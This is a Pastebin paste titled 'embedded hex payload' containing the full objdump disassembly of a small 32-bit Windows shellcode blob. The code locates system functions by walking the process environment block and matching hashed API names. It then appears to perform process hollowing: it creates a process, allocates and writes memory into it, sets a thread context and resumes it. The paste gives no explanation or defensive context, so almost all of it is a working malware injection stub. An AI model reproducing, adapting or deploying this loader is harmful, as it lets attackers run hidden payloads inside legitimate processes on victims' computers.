API tools faq
paste
Advertisement
Guest User

embedded hex payload

a guest
Apr 11th, 2013
89
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 19.86 KB | None | 0 0
raw download clone embed print report
  1. asm.bin:     file format binary
  2.  
  3. Sections:
  4. Idx Name          Size      VMA       LMA       File off  Algn
  5.   0 .data         00000507  00000000  00000000  00000000  2**0
  6.                   CONTENTS, ALLOC, LOAD, DATA
  7.  
  8. Disassembly of section .data:
  9.  
  10. 00000000 <.data>:
  11.    0:   60                      pusha  
  12.    1:   e8 4e 00 00 00          call   0x54
  13.    6:   6b 00 65                imul   eax,DWORD PTR [eax],0x65
  14.    9:   00 72 00                add    BYTE PTR [edx+0x0],dh
  15.    c:   6e                      outs   dx,BYTE PTR ds:[esi]
  16.    d:   00 65 00                add    BYTE PTR [ebp+0x0],ah
  17.   10:   6c                      ins    BYTE PTR es:[edi],dx
  18.   11:   00 33                   add    BYTE PTR [ebx],dh
  19.   13:   00 32                   add    BYTE PTR [edx],dh
  20.   15:   00 00                   add    BYTE PTR [eax],al
  21.   17:   00 6e 00                add    BYTE PTR [esi+0x0],ch
  22.   1a:   74 00                   je     0x1c
  23.   1c:   64 00 6c 00 6c          add    BYTE PTR fs:[eax+eax*1+0x6c],ch
  24.     ...
  25.   51:   00 00                   add    BYTE PTR [eax],al
  26.   53:   5b                      pop    ebx
  27.   54:   8b fc                   mov    edi,esp
  28.   56:   6a 42                   push   0x42
  29.   58:   e8 bb 03 00 00          call   0x418
  30.   5d:   8b 54 24 28             mov    edx,DWORD PTR [esp+0x28]
  31.   61:   89 11                   mov    DWORD PTR [ecx],edx
  32.   63:   8b 54 24 2c             mov    edx,DWORD PTR [esp+0x2c]
  33.   67:   6a 3e                   push   0x3e
  34.   69:   e8 aa 03 00 00          call   0x418
  35.   6e:   89 11                   mov    DWORD PTR [ecx],edx
  36.   70:   6a 4a                   push   0x4a
  37.   72:   e8 a1 03 00 00          call   0x418
  38.   77:   89 39                   mov    DWORD PTR [ecx],edi
  39.   79:   6a 1e                   push   0x1e
  40.   7b:   6a 3c                   push   0x3c
  41.   7d:   e8 9d 03 00 00          call   0x41f
  42.   82:   6a 22                   push   0x22
  43.   84:   68 f4 00 00 00          push   0xf4
  44.   89:   e8 91 03 00 00          call   0x41f
  45.   8e:   6a 26                   push   0x26
  46.   90:   6a 24                   push   0x24
  47.   92:   e8 88 03 00 00          call   0x41f
  48.   97:   6a 2a                   push   0x2a
  49.   99:   6a 40                   push   0x40
  50.   9b:   e8 7f 03 00 00          call   0x41f
  51.   a0:   6a 2e                   push   0x2e
  52.   a2:   6a 0c                   push   0xc
  53.   a4:   e8 76 03 00 00          call   0x41f
  54.   a9:   6a 32                   push   0x32
  55.   ab:   68 c8 00 00 00          push   0xc8
  56.   b0:   e8 6a 03 00 00          call   0x41f
  57.   b5:   6a 2a                   push   0x2a
  58.   b7:   e8 5c 03 00 00          call   0x418
  59.   bc:   8b 09                   mov    ecx,DWORD PTR [ecx]
  60.   be:   c7 01 44 00 00 00       mov    DWORD PTR [ecx],0x44
  61.   c4:   6a 12                   push   0x12
  62.   c6:   e8 4d 03 00 00          call   0x418
  63.   cb:   68 5b e8 14 cf          push   0xcf14e85b
  64.   d0:   51                      push   ecx
  65.   d1:   e8 79 03 00 00          call   0x44f
  66.   d6:   6a 3e                   push   0x3e
  67.   d8:   e8 3b 03 00 00          call   0x418
  68.   dd:   8b d1                   mov    edx,ecx
  69.   df:   6a 1e                   push   0x1e
  70.   e1:   e8 32 03 00 00          call   0x418
  71.   e6:   6a 40                   push   0x40
  72.   e8:   ff 32                   push   DWORD PTR [edx]
  73.   ea:   ff 31                   push   DWORD PTR [ecx]
  74.   ec:   ff d0                   call   eax
  75.   ee:   6a 12                   push   0x12
  76.   f0:   e8 23 03 00 00          call   0x418
  77.   f5:   68 5b e8 14 cf          push   0xcf14e85b
  78.   fa:   51                      push   ecx
  79.   fb:   e8 4f 03 00 00          call   0x44f
  80.  100:   6a 1e                   push   0x1e
  81.  102:   e8 11 03 00 00          call   0x418
  82.  107:   8b 09                   mov    ecx,DWORD PTR [ecx]
  83.  109:   8b 51 3c                mov    edx,DWORD PTR [ecx+0x3c]
  84.  10c:   6a 3e                   push   0x3e
  85.  10e:   e8 05 03 00 00          call   0x418
  86.  113:   8b 39                   mov    edi,DWORD PTR [ecx]
  87.  115:   03 fa                   add    edi,edx
  88.  117:   6a 22                   push   0x22
  89.  119:   e8 fa 02 00 00          call   0x418
  90.  11e:   8b 09                   mov    ecx,DWORD PTR [ecx]
  91.  120:   68 f8 00 00 00          push   0xf8
  92.  125:   57                      push   edi
  93.  126:   51                      push   ecx
  94.  127:   ff d0                   call   eax
  95.  129:   6a 00                   push   0x0
  96.  12b:   e8 e8 02 00 00          call   0x418
  97.  130:   68 88 fe b3 16          push   0x16b3fe88
  98.  135:   51                      push   ecx
  99.  136:   e8 14 03 00 00          call   0x44f
  100.  13b:   6a 2e                   push   0x2e
  101.  13d:   e8 d6 02 00 00          call   0x418
  102.  142:   8b 39                   mov    edi,DWORD PTR [ecx]
  103.  144:   6a 2a                   push   0x2a
  104.  146:   e8 cd 02 00 00          call   0x418
  105.  14b:   8b 11                   mov    edx,DWORD PTR [ecx]
  106.  14d:   6a 42                   push   0x42
  107.  14f:   e8 c4 02 00 00          call   0x418
  108.  154:   57                      push   edi
  109.  155:   52                      push   edx
  110.  156:   6a 00                   push   0x0
  111.  158:   6a 00                   push   0x0
  112.  15a:   6a 04                   push   0x4
  113.  15c:   6a 00                   push   0x0
  114.  15e:   6a 00                   push   0x0
  115.  160:   6a 00                   push   0x0
  116.  162:   6a 00                   push   0x0
  117.  164:   ff 31                   push   DWORD PTR [ecx]
  118.  166:   ff d0                   call   eax
  119.  168:   6a 12                   push   0x12
  120.  16a:   e8 a9 02 00 00          call   0x418
  121.  16f:   68 d0 37 10 f2          push   0xf21037d0
  122.  174:   51                      push   ecx
  123.  175:   e8 d5 02 00 00          call   0x44f
  124.  17a:   6a 22                   push   0x22
  125.  17c:   e8 97 02 00 00          call   0x418
  126.  181:   8b 11                   mov    edx,DWORD PTR [ecx]
  127.  183:   6a 2e                   push   0x2e
  128.  185:   e8 8e 02 00 00          call   0x418
  129.  18a:   8b 09                   mov    ecx,DWORD PTR [ecx]
  130.  18c:   ff 72 34                push   DWORD PTR [edx+0x34]
  131.  18f:   ff 31                   push   DWORD PTR [ecx]
  132.  191:   ff d0                   call   eax
  133.  193:   6a 00                   push   0x0
  134.  195:   e8 7e 02 00 00          call   0x418
  135.  19a:   68 9c 95 1a 6e          push   0x6e1a959c
  136.  19f:   51                      push   ecx
  137.  1a0:   e8 aa 02 00 00          call   0x44f
  138.  1a5:   6a 22                   push   0x22
  139.  1a7:   e8 6c 02 00 00          call   0x418
  140.  1ac:   8b 11                   mov    edx,DWORD PTR [ecx]
  141.  1ae:   8b 39                   mov    edi,DWORD PTR [ecx]
  142.  1b0:   6a 2e                   push   0x2e
  143.  1b2:   e8 61 02 00 00          call   0x418
  144.  1b7:   8b 09                   mov    ecx,DWORD PTR [ecx]
  145.  1b9:   6a 40                   push   0x40
  146.  1bb:   68 00 30 00 00          push   0x3000
  147.  1c0:   ff 72 50                push   DWORD PTR [edx+0x50]
  148.  1c3:   ff 77 34                push   DWORD PTR [edi+0x34]
  149.  1c6:   ff 31                   push   DWORD PTR [ecx]
  150.  1c8:   ff d0                   call   eax
  151.  1ca:   6a 36                   push   0x36
  152.  1cc:   e8 47 02 00 00          call   0x418
  153.  1d1:   8b d1                   mov    edx,ecx
  154.  1d3:   6a 22                   push   0x22
  155.  1d5:   e8 3e 02 00 00          call   0x418
  156.  1da:   8b 39                   mov    edi,DWORD PTR [ecx]
  157.  1dc:   6a 3e                   push   0x3e
  158.  1de:   e8 35 02 00 00          call   0x418
  159.  1e3:   8b 31                   mov    esi,DWORD PTR [ecx]
  160.  1e5:   6a 22                   push   0x22
  161.  1e7:   e8 2c 02 00 00          call   0x418
  162.  1ec:   8b 01                   mov    eax,DWORD PTR [ecx]
  163.  1ee:   6a 2e                   push   0x2e
  164.  1f0:   e8 23 02 00 00          call   0x418
  165.  1f5:   8b 09                   mov    ecx,DWORD PTR [ecx]
  166.  1f7:   52                      push   edx
  167.  1f8:   ff 77 54                push   DWORD PTR [edi+0x54]
  168.  1fb:   56                      push   esi
  169.  1fc:   ff 70 34                push   DWORD PTR [eax+0x34]
  170.  1ff:   ff 31                   push   DWORD PTR [ecx]
  171.  201:   6a 00                   push   0x0
  172.  203:   e8 10 02 00 00          call   0x418
  173.  208:   68 a1 6a 3d d8          push   0xd83d6aa1
  174.  20d:   51                      push   ecx
  175.  20e:   e8 3c 02 00 00          call   0x44f
  176.  213:   83 c4 0c                add    esp,0xc
  177.  216:   ff d0                   call   eax
  178.  218:   6a 12                   push   0x12
  179.  21a:   e8 f9 01 00 00          call   0x418
  180.  21f:   68 5b e8 14 cf          push   0xcf14e85b
  181.  224:   51                      push   ecx
  182.  225:   e8 25 02 00 00          call   0x44f
  183.  22a:   6a 22                   push   0x22
  184.  22c:   e8 e7 01 00 00          call   0x418
  185.  231:   8b 11                   mov    edx,DWORD PTR [ecx]
  186.  233:   83 c2 06                add    edx,0x6
  187.  236:   6a 3a                   push   0x3a
  188.  238:   e8 db 01 00 00          call   0x418
  189.  23d:   6a 02                   push   0x2
  190.  23f:   52                      push   edx
  191.  240:   51                      push   ecx
  192.  241:   ff d0                   call   eax
  193.  243:   6a 36                   push   0x36
  194.  245:   e8 ce 01 00 00          call   0x418
  195.  24a:   c7 01 00 00 00 00       mov    DWORD PTR [ecx],0x0
  196.  250:   b8 28 00 00 00          mov    eax,0x28
  197.  255:   6a 36                   push   0x36
  198.  257:   e8 bc 01 00 00          call   0x418
  199.  25c:   f7 21                   mul    DWORD PTR [ecx]
  200.  25e:   6a 1e                   push   0x1e
  201.  260:   e8 b3 01 00 00          call   0x418
  202.  265:   8b 11                   mov    edx,DWORD PTR [ecx]
  203.  267:   8b 52 3c                mov    edx,DWORD PTR [edx+0x3c]
  204.  26a:   81 c2 f8 00 00 00       add    edx,0xf8
  205.  270:   03 d0                   add    edx,eax
  206.  272:   6a 3e                   push   0x3e
  207.  274:   e8 9f 01 00 00          call   0x418
  208.  279:   03 11                   add    edx,DWORD PTR [ecx]
  209.  27b:   6a 26                   push   0x26
  210.  27d:   e8 96 01 00 00          call   0x418
  211.  282:   6a 28                   push   0x28
  212.  284:   52                      push   edx
  213.  285:   ff 31                   push   DWORD PTR [ecx]
  214.  287:   6a 12                   push   0x12
  215.  289:   e8 8a 01 00 00          call   0x418
  216.  28e:   68 5b e8 14 cf          push   0xcf14e85b
  217.  293:   51                      push   ecx
  218.  294:   e8 b6 01 00 00          call   0x44f
  219.  299:   83 c4 0c                add    esp,0xc
  220.  29c:   ff d0                   call   eax
  221.  29e:   6a 26                   push   0x26
  222.  2a0:   e8 73 01 00 00          call   0x418
  223.  2a5:   8b 39                   mov    edi,DWORD PTR [ecx]
  224.  2a7:   8b 09                   mov    ecx,DWORD PTR [ecx]
  225.  2a9:   8b 71 14                mov    esi,DWORD PTR [ecx+0x14]
  226.  2ac:   6a 3e                   push   0x3e
  227.  2ae:   e8 65 01 00 00          call   0x418
  228.  2b3:   03 31                   add    esi,DWORD PTR [ecx]
  229.  2b5:   6a 26                   push   0x26
  230.  2b7:   e8 5c 01 00 00          call   0x418
  231.  2bc:   8b 09                   mov    ecx,DWORD PTR [ecx]
  232.  2be:   8b 51 0c                mov    edx,DWORD PTR [ecx+0xc]
  233.  2c1:   6a 22                   push   0x22
  234.  2c3:   e8 50 01 00 00          call   0x418
  235.  2c8:   8b 09                   mov    ecx,DWORD PTR [ecx]
  236.  2ca:   03 51 34                add    edx,DWORD PTR [ecx+0x34]
  237.  2cd:   6a 46                   push   0x46
  238.  2cf:   e8 44 01 00 00          call   0x418
  239.  2d4:   8b c1                   mov    eax,ecx
  240.  2d6:   6a 2e                   push   0x2e
  241.  2d8:   e8 3b 01 00 00          call   0x418
  242.  2dd:   8b 09                   mov    ecx,DWORD PTR [ecx]
  243.  2df:   50                      push   eax
  244.  2e0:   ff 77 10                push   DWORD PTR [edi+0x10]
  245.  2e3:   56                      push   esi
  246.  2e4:   52                      push   edx
  247.  2e5:   ff 31                   push   DWORD PTR [ecx]
  248.  2e7:   6a 00                   push   0x0
  249.  2e9:   e8 2a 01 00 00          call   0x418
  250.  2ee:   68 a1 6a 3d d8          push   0xd83d6aa1
  251.  2f3:   51                      push   ecx
  252.  2f4:   e8 56 01 00 00          call   0x44f
  253.  2f9:   83 c4 0c                add    esp,0xc
  254.  2fc:   ff d0                   call   eax
  255.  2fe:   6a 36                   push   0x36
  256.  300:   e8 13 01 00 00          call   0x418
  257.  305:   8b 11                   mov    edx,DWORD PTR [ecx]
  258.  307:   83 c2 01                add    edx,0x1
  259.  30a:   89 11                   mov    DWORD PTR [ecx],edx
  260.  30c:   6a 3a                   push   0x3a
  261.  30e:   e8 05 01 00 00          call   0x418
  262.  313:   8b 09                   mov    ecx,DWORD PTR [ecx]
  263.  315:   3b ca                   cmp    ecx,edx
  264.  317:   0f 85 33 ff ff ff       jne    0x250
  265.  31d:   6a 32                   push   0x32
  266.  31f:   e8 f4 00 00 00          call   0x418
  267.  324:   8b 09                   mov    ecx,DWORD PTR [ecx]
  268.  326:   c7 01 07 00 01 00       mov    DWORD PTR [ecx],0x10007
  269.  32c:   6a 00                   push   0x0
  270.  32e:   e8 e5 00 00 00          call   0x418
  271.  333:   68 d2 c7 a7 68          push   0x68a7c7d2
  272.  338:   51                      push   ecx
  273.  339:   e8 11 01 00 00          call   0x44f
  274.  33e:   6a 32                   push   0x32
  275.  340:   e8 d3 00 00 00          call   0x418
  276.  345:   8b 11                   mov    edx,DWORD PTR [ecx]
  277.  347:   6a 2e                   push   0x2e
  278.  349:   e8 ca 00 00 00          call   0x418
  279.  34e:   8b 09                   mov    ecx,DWORD PTR [ecx]
  280.  350:   52                      push   edx
  281.  351:   ff 71 04                push   DWORD PTR [ecx+0x4]
  282.  354:   ff d0                   call   eax
  283.  356:   6a 22                   push   0x22
  284.  358:   e8 bb 00 00 00          call   0x418
  285.  35d:   8b 39                   mov    edi,DWORD PTR [ecx]
  286.  35f:   83 c7 34                add    edi,0x34
  287.  362:   6a 32                   push   0x32
  288.  364:   e8 af 00 00 00          call   0x418
  289.  369:   8b 31                   mov    esi,DWORD PTR [ecx]
  290.  36b:   8b b6 a4 00 00 00       mov    esi,DWORD PTR [esi+0xa4]
  291.  371:   83 c6 08                add    esi,0x8
  292.  374:   6a 2e                   push   0x2e
  293.  376:   e8 9d 00 00 00          call   0x418
  294.  37b:   8b 11                   mov    edx,DWORD PTR [ecx]
  295.  37d:   6a 46                   push   0x46
  296.  37f:   e8 94 00 00 00          call   0x418
  297.  384:   51                      push   ecx
  298.  385:   6a 04                   push   0x4
  299.  387:   57                      push   edi
  300.  388:   56                      push   esi
  301.  389:   ff 32                   push   DWORD PTR [edx]
  302.  38b:   6a 00                   push   0x0
  303.  38d:   e8 86 00 00 00          call   0x418
  304.  392:   68 a1 6a 3d d8          push   0xd83d6aa1
  305.  397:   51                      push   ecx
  306.  398:   e8 b2 00 00 00          call   0x44f
  307.  39d:   83 c4 0c                add    esp,0xc
  308.  3a0:   ff d0                   call   eax
  309.  3a2:   6a 22                   push   0x22
  310.  3a4:   e8 6f 00 00 00          call   0x418
  311.  3a9:   8b 09                   mov    ecx,DWORD PTR [ecx]
  312.  3ab:   8b 51 28                mov    edx,DWORD PTR [ecx+0x28]
  313.  3ae:   03 51 34                add    edx,DWORD PTR [ecx+0x34]
  314.  3b1:   6a 32                   push   0x32
  315.  3b3:   e8 60 00 00 00          call   0x418
  316.  3b8:   8b 09                   mov    ecx,DWORD PTR [ecx]
  317.  3ba:   81 c1 b0 00 00 00       add    ecx,0xb0
  318.  3c0:   89 11                   mov    DWORD PTR [ecx],edx
  319.  3c2:   6a 00                   push   0x0
  320.  3c4:   e8 4f 00 00 00          call   0x418
  321.  3c9:   68 d3 c7 a7 e8          push   0xe8a7c7d3
  322.  3ce:   51                      push   ecx
  323.  3cf:   e8 7b 00 00 00          call   0x44f
  324.  3d4:   6a 32                   push   0x32
  325.  3d6:   e8 3d 00 00 00          call   0x418
  326.  3db:   8b d1                   mov    edx,ecx
  327.  3dd:   6a 2e                   push   0x2e
  328.  3df:   e8 34 00 00 00          call   0x418
  329.  3e4:   8b 09                   mov    ecx,DWORD PTR [ecx]
  330.  3e6:   ff 32                   push   DWORD PTR [edx]
  331.  3e8:   ff 71 04                push   DWORD PTR [ecx+0x4]
  332.  3eb:   ff d0                   call   eax
  333.  3ed:   6a 00                   push   0x0
  334.  3ef:   e8 24 00 00 00          call   0x418
  335.  3f4:   68 88 3f 4a 9e          push   0x9e4a3f88
  336.  3f9:   51                      push   ecx
  337.  3fa:   e8 50 00 00 00          call   0x44f
  338.  3ff:   6a 2e                   push   0x2e
  339.  401:   e8 12 00 00 00          call   0x418
  340.  406:   8b 09                   mov    ecx,DWORD PTR [ecx]
  341.  408:   ff 71 04                push   DWORD PTR [ecx+0x4]
  342.  40b:   ff d0                   call   eax
  343.  40d:   6a 4a                   push   0x4a
  344.  40f:   e8 04 00 00 00          call   0x418
  345.  414:   8b 21                   mov    esp,DWORD PTR [ecx]
  346.  416:   61                      popa  
  347.  417:   c3                      ret    
  348.  418:   8b cb                   mov    ecx,ebx
  349.  41a:   03 4c 24 04             add    ecx,DWORD PTR [esp+0x4]
  350.  41e:   c3                      ret    
  351.  41f:   6a 00                   push   0x0
  352.  421:   e8 f2 ff ff ff          call   0x418
  353.  426:   68 54 ca af 91          push   0x91afca54
  354.  42b:   51                      push   ecx
  355.  42c:   e8 1e 00 00 00          call   0x44f
  356.  431:   6a 40                   push   0x40
  357.  433:   68 00 10 00 00          push   0x1000
  358.  438:   ff 74 24 18             push   DWORD PTR [esp+0x18]
  359.  43c:   6a 00                   push   0x0
  360.  43e:   ff d0                   call   eax
  361.  440:   ff 74 24 14             push   DWORD PTR [esp+0x14]
  362.  444:   e8 cf ff ff ff          call   0x418
  363.  449:   89 01                   mov    DWORD PTR [ecx],eax
  364.  44b:   83 c4 10                add    esp,0x10
  365.  44e:   c3                      ret    
  366.  44f:   e8 22 00 00 00          call   0x476
  367.  454:   68 a4 4e 0e ec          push   0xec0e4ea4
  368.  459:   50                      push   eax
  369.  45a:   e8 4b 00 00 00          call   0x4aa
  370.  45f:   83 c4 08                add    esp,0x8
  371.  462:   ff 74 24 04             push   DWORD PTR [esp+0x4]
  372.  466:   ff d0                   call   eax
  373.  468:   ff 74 24 08             push   DWORD PTR [esp+0x8]
  374.  46c:   50                      push   eax
  375.  46d:   e8 38 00 00 00          call   0x4aa
  376.  472:   83 c4 08                add    esp,0x8
  377.  475:   c3                      ret    
  378.  476:   55                      push   ebp
  379.  477:   52                      push   edx
  380.  478:   51                      push   ecx
  381.  479:   53                      push   ebx
  382.  47a:   56                      push   esi
  383.  47b:   57                      push   edi
  384.  47c:   33 c0                   xor    eax,eax
  385.  47e:   64 8b 70 30             mov    esi,DWORD PTR fs:[eax+0x30]
  386.  482:   8b 76 0c                mov    esi,DWORD PTR [esi+0xc]
  387.  485:   8b 76 1c                mov    esi,DWORD PTR [esi+0x1c]
  388.  488:   8b 6e 08                mov    ebp,DWORD PTR [esi+0x8]
  389.  48b:   8b 7e 20                mov    edi,DWORD PTR [esi+0x20]
  390.  48e:   8b 36                   mov    esi,DWORD PTR [esi]
  391.  490:   38 47 18                cmp    BYTE PTR [edi+0x18],al
  392.  493:   75 f3                   jne    0x488
  393.  495:   80 3f 6b                cmp    BYTE PTR [edi],0x6b
  394.  498:   74 07                   je     0x4a1
  395.  49a:   80 3f 4b                cmp    BYTE PTR [edi],0x4b
  396.  49d:   74 02                   je     0x4a1
  397.  49f:   eb e7                   jmp    0x488
  398.  4a1:   8b c5                   mov    eax,ebp
  399.  4a3:   5f                      pop    edi
  400.  4a4:   5e                      pop    esi
  401.  4a5:   5b                      pop    ebx
  402.  4a6:   59                      pop    ecx
  403.  4a7:   5a                      pop    edx
  404.  4a8:   5d                      pop    ebp
  405.  4a9:   c3                      ret    
  406.  4aa:   55                      push   ebp
  407.  4ab:   52                      push   edx
  408.  4ac:   51                      push   ecx
  409.  4ad:   53                      push   ebx
  410.  4ae:   56                      push   esi
  411.  4af:   57                      push   edi
  412.  4b0:   8b 6c 24 1c             mov    ebp,DWORD PTR [esp+0x1c]
  413.  4b4:   85 ed                   test   ebp,ebp
  414.  4b6:   74 43                   je     0x4fb
  415.  4b8:   8b 45 3c                mov    eax,DWORD PTR [ebp+0x3c]
  416.  4bb:   8b 54 28 78             mov    edx,DWORD PTR [eax+ebp*1+0x78]
  417.  4bf:   03 d5                   add    edx,ebp
  418.  4c1:   8b 4a 18                mov    ecx,DWORD PTR [edx+0x18]
  419.  4c4:   8b 5a 20                mov    ebx,DWORD PTR [edx+0x20]
  420.  4c7:   03 dd                   add    ebx,ebp
  421.  4c9:   e3 30                   jecxz  0x4fb
  422.  4cb:   49                      dec    ecx
  423.  4cc:   8b 34 8b                mov    esi,DWORD PTR [ebx+ecx*4]
  424.  4cf:   03 f5                   add    esi,ebp
  425.  4d1:   33 ff                   xor    edi,edi
  426.  4d3:   33 c0                   xor    eax,eax
  427.  4d5:   fc                      cld    
  428.  4d6:   ac                      lods   al,BYTE PTR ds:[esi]
  429.  4d7:   84 c0                   test   al,al
  430.  4d9:   74 07                   je     0x4e2
  431.  4db:   c1 cf 0d                ror    edi,0xd
  432.  4de:   03 f8                   add    edi,eax
  433.  4e0:   eb f4                   jmp    0x4d6
  434.  4e2:   3b 7c 24 20             cmp    edi,DWORD PTR [esp+0x20]
  435.  4e6:   75 e1                   jne    0x4c9
  436.  4e8:   8b 5a 24                mov    ebx,DWORD PTR [edx+0x24]
  437.  4eb:   03 dd                   add    ebx,ebp
  438.  4ed:   66 8b 0c 4b             mov    cx,WORD PTR [ebx+ecx*2]
  439.  4f1:   8b 5a 1c                mov    ebx,DWORD PTR [edx+0x1c]
  440.  4f4:   03 dd                   add    ebx,ebp
  441.  4f6:   8b 04 8b                mov    eax,DWORD PTR [ebx+ecx*4]
  442.  4f9:   03 c5                   add    eax,ebp
  443.  4fb:   5f                      pop    edi
  444.  4fc:   5e                      pop    esi
  445.  4fd:   5b                      pop    ebx
  446.  4fe:   59                      pop    ecx
  447.  4ff:   5a                      pop    edx
  448.  500:   5d                      pop    ebp
  449.  501:   c3                      ret    
  450.  502:   c3                      ret    
  451.  503:   00 00                   add    BYTE PTR [eax],al
  452.     ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!